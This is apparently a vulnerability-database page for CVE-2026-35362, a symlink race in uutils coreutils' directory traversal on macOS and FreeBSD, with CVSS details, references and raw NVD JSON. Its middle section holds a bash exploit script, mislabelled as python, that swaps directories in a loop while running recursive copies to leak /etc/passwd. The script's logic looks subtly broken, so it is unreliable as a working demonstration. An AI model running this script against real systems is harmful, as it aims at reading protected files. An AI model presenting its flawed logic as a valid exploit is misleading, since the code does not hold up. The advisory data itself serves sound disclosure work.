CVE-2026-35362

Description

The safe_traversal module in uutils coreutils, which provides protection against Time-of-Check to Time-of-Use (TOCTOU) symlink races using file-descriptor-relative syscalls, is incorrectly limited to Linux targets. On other Unix-like systems such as macOS and FreeBSD, the utility fails to utilize these protections, leaving directory traversal operations vulnerable to symlink race conditions.

CVSS Details

CVSS Score

3.6

Severity

LOW

CVSS Vector

CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:uutils:coreutils:*:*:*:*:*:rust:*:* - VULNERABLE

uutils coreutils < 0.6.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/bin/bash
# PoC for CVE-2026-35362: TOCTOU race condition in uutils coreutils on non-Linux systems

TARGET_DIR="safe_dir"
SYMLINK_TARGET="/etc/passwd" # Target sensitive file
SYMLINK_NAME="link_dir"
DESTINATION="output_dir"

# Setup environment
mkdir -p "$TARGET_DIR"
mkdir -p "$DESTINATION"
ln -s "$SYMLINK_TARGET" "$SYMLINK_NAME"

echo "[+] Starting race condition simulation..."

# Attacker process: Swap directories rapidly to exploit the window
while true; do
    mv "$TARGET_DIR" "tmp_dir"
    mv "$SYMLINK_NAME" "$TARGET_DIR"
    mv "tmp_dir" "$SYMLINK_NAME"
done &

ATTACKER_PID=$!

# Victim process: Run uutils command (e.g., cp) repeatedly
echo "[+] Running vulnerable uutils command..."
for i in {1..100}; do
    # On macOS/FreeBSD, this might follow the symlink to /etc/passwd
    # due to missing safe_traversal protections
    uutils-cp -r "$TARGET_DIR"/* "$DESTINATION" 2>/dev/null &
done

# Cleanup
sleep 2
kill $ATTACKER_PID 2>/dev/null
rm -rf "$TARGET_DIR" "$SYMLINK_NAME" "tmp_dir" "$DESTINATION"

echo "[+] Check $DESTINATION for potential sensitive file leakage."

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-35362
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-35362
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-35362/
[4] VulDB https://vuldb.com/cve/CVE-2026-35362
[5] https://github.com/uutils/coreutils/pull/9792
[6] https://github.com/uutils/coreutils/releases/tag/0.6.0

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-35362", "sourceIdentifier": "[email protected]", "published": "2026-04-22T17:16:38.960", "lastModified": "2026-04-27T12:26:40.533", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "The safe_traversal module in uutils coreutils, which provides protection against Time-of-Check to Time-of-Use (TOCTOU) symlink races using file-descriptor-relative syscalls, is incorrectly limited to Linux targets. On other Unix-like systems such as macOS and FreeBSD, the utility fails to utilize these protections, leaving directory traversal operations vulnerable to symlink race conditions."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:N", "baseScore": 3.6, "baseSeverity": "LOW", "attackVector": "LOCAL", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.0, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-367"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:uutils:coreutils:*:*:*:*:*:rust:*:*", "versionEndExcluding": "0.6.0", "matchCriteriaId": "87C33018-2E08-45B0-B69C-7FC224F7F883"}]}]}], "references": [{"url": "https://github.com/uutils/coreutils/pull/9792", "source": "[email protected]", "tags": ["Issue Tracking", "Patch"]}, {"url": "https://github.com/uutils/coreutils/releases/tag/0.6.0", "source": "[email protected]", "tags": ["Release Notes"]}]}}